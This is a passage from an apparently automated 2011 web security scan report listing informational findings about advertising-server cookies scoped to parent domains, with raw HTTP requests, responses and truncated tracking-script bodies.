Set-Cookie: adImpCount=Z1-UkUPq1vFj8GCnevJA2KXPE2TFnOA0M_WT2exB_6Nh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MBxqPiAYpCYd3j_6MfsPlMh53jqED7k2YniAtZPVqfFWyxKvcAJbr9b_kzSFkanJuWO28abj1iv9Gv55XNWfMiw5pMuH6RTJNAHblpwBDk2T1wXcoL7Q2zkkhi9AC1e6PNmlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3
C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib1OoXqrfdwtdG7Pp8fEmP0RO1BgA0BJmNitU_2NEj2fHdezpP7kSHcGVCNOXldgVDwW4Q7G96F_uxzfd0sMvSg4z5M54jeAtYCpK6P6H7YLfn1DM2JHon2Lg_l7lDsiT8znxJAatjK_8wTO5tRuZ3XmAl8yAkjzMu60avymcp27zO-9MBVRaOICeVmt0y5elVS00w8o4kTkeT0M3Rv13tNe-KMtsmN_rfKIZLBsrIbZ0Ab_1obB3eU-U6Z0afsrnZftOdxqgu9zaA9BEiA6GyCALmKUKKFE7ohNDi6PefIl64Pb4jyDZez37XoLDFRz9aXnoPz5SThj_DvdguRRNEucYg00aQbrhHmId6TwPhXu76yC6Xpua0XHhwiiO6LimyFMzyKuXBH_zaKGoR-cizFPU5q-qS65e77PR9HaVucWwVvnmlsEQ_Atbdsc7UFm5r_xNRMntMj0v83tuXwoxESvmHp0q8wlx1yaN_b8Qgsy2AKyQi2Rbow26cVTOuaTA2O7EcPEhO-noAo46R_e24qwGCrSBorbtNH5M4cO413R5q6ohebL9J2uZQCBqdE68xlu-7BMsZILlJ1GaKK7JeQ0NX3h3aJ1949KHw8E3HcObqqagiCGVgCdK45TXMokXLNbLuay2_Mt8CFITD7Jngr96fRVjMkjVdVwCfn3jY17LdcA89lw_nuxmuMlq4JPuMvBgd7KD-dSBKfWGSR1M5LiNft9usTHYdghvjPaGdOl0oeDPIpDvfXPcF_hHNKAWi9PW-kET4hoTQkmFc9qp_NZWUKqCzXEjua3bdNL3CHoIF3JRLm-lzLvmU4Mu5vDpETlLJNWSrKQ378tsap95j5WqVoBRRvw_8l_9s_rOZMLzYU2TbhE8zQ2PWHJZhQi88rAm7PyPAWBG8bc1l4eZXJ7qI6SVzjsUIQsGpeiuqy0wZsvJnUfvCegfWPkjFXygnBsrvjdzgzubbc5BofE4fxcMPpyUlfN1EzgUZ2v0L4yTh1VNDYPhttMQaQJ-b77UV8QBUBB42JBqSKatn3vpXyL6TOAicxCOf2XgpY5js6GsmnvWs8SyvDw_QeTyHBaWJSPcsWWbSJo-8gq8nYPQ6BzbnNtDWU-qVEEawvsFJvVrgq6UuEmTyoYjhtb_gPFxhiDjF0OxifaKQDH01ro4Wwg; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: fc=vaJ6aoyywMi4NqtlKsU64lht9mm7-E1xIImTItPA1urbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOwF6Kobi_0otjkQAmScc-TZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: pf=A62R0s-qigjspkCN3ccCJZUfVYhQeEUQKVt0ATDwEBd4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg636sNildKFCNXpyKvUiTLZIHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:22 GMT
Content-Length: 10227


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

13.11. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:39:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:39:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:33 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

13.12. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 11:39:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjNt9jGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:39:41 GMT
Set-Cookie: ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:39:41 GMT
Set-Cookie: vsd=0@1@4dcbc6fd@cdn.turn.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 11:39:41 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

13.13. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J07717 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://media.ft.com/h/subs.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Q2bN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Q2bN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LKv8="MLsXrrEOpxpv55C28tahZ2a57v4BlBldCJ+Iio1e3Hap1Il9kVWT6VLylaFsMiOIFsKHpjjz7J2U7z9Uo4JeZID1W23WKas0Wh9C6Sor/tzggGLG8gt5zaN4m4WCHIidCpV6s3HMduhPPOd/6/olAcH77sPsFms0zIbhzNkwT9vKMU81lpWZk1hblau2nsfXOr2KsTF2nk2To/EmZI/ry2OVE13p6cA6rTTEk45VWgFNzHgRD9gBbu89J7MfO4f070NcasoleESOqPrJoAP0gbCr4HCJhVixf5QrQTSZEBNgGBsQs+nq3jKvbaIkKQgR2iWvce7Q7r7mn6DXgQoxk5Tc5XaZ26hUUK613yi5NPphPfjyJS5dNn6cor+5Z7/2w3GYUjhihK8UhHxBga6IzOc37/8ibz0xRpSwHDTgnZJmdSouDmILRcdLlOCqO2KvS8CglyIyIW36CjCyqPKXZ4mA+Ch2F7VzK1m4ynmwvMzE71WWAm9cuv1GAdRRNpmJeDTgdJLe5OePC2hhiMIwAh/LQpSKkYrFcAsXYhZ8x2aBT0Ry0BO7QXLXKedgCeNMMCOF+CBkmO8YeNkfEsag2hVDbdJ9ACEK/9eg5SEAZFPfmDNt2tj2Ive5NyF4L0J8+JNCfYqY2FcOywI4omJJUnsX2TgkFngrQVU5K0yXFYE47bgxdx6YBA/4IXTuF0oGmxLuY7MSgWmNt8J7Xl5naLyZNUEwjp30jM5mNPCnGx4DFUAsxq7Yojzi/6hvo1fbz2JPQytoz0FEDVAJEeN2yP0IsMD5jItWPUv7Wx1AX7BAgwjJ4RMIwhwVlxJl9eoB2GMv1GB+8rrbAB9JwdaoP9lw7ezBcOJkp+N1aBrbLaNdoiJs/tXABJ8fRJ3A09CfnY0IjO2OzSoL4a75tNhRCfLQCzKrd+0HJP/8Y+q+ZXwLhuINuKf7CjTqzqhiG1tOtM4bvtzZG52dZgOJRnICiL1WDobijiTGfV6yV7JbAY/Zx5Uj69IrD7PwohPAkfVj7374Hf0Mnk/V8lbUnEAiHKOWdDRM0vEHnJohXzsgNusj9VGXR0TAtczxjdxPwOxJK6PC0aZ93oM725lCigs3hxCnE7kpU6IaDCYi0U0Jf+h9RTbohCnJCS6b3Dd2l8pJw/6902gfxDyhg25fVt6lGrrCscWGC/PAtNaccUCI5BPyRyOludJgBzYr/ULdM/jlcEo6n3igTIpIeWIa5s378NY8CUro/sTIkMTtiwIUFGHuZ/4k8b8alBAdnqbr3UzFBL8d45cKuIO1mY03cnXCDOmOWQoLCg6BiMYfhaMhueht/Mays9BrXFCmJHyGf4LBdNeeI1EYCweAIZJqsJb90A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:39 GMT
Content-Length: 2242

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.14. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J07717 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vmwK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vmwK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SoYd="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:11 GMT
Content-Length: 2174

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.15. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-703456-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1215295-1264419-593881-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1096152-1049851-1063912-1166710-1063916-588118-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1224040-1006093-617983-86237-1006089-1009578-1049785-1191521-1092989-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-672502-1009462-397180-1044578-1010301-1146866-1041270-1020427-1093092-1093093-1049769-1049770-596293-596292-576685-1049772-596291-1044587 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_KXHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KXHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlbG="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:37:47 GMT

GIF89a.............!.......,...........D..;

13.16. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-703456-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1215295-1264419-593881-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1096152-1049851-1063912-1166710-1063916-588118-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1006093-617983-86237-1006089-1009578-1049785-1191521-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-672502-1009462-397180-1044578-1010301-1041270-1020427-1093092-1093093-1049769-1049770-596293-576685-596292-1049772-596291-1044587 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://media.ft.com/h/subs.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_av67=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_av67=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dq3p="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:03:55 GMT

GIF89a.............!.......,...........D..;

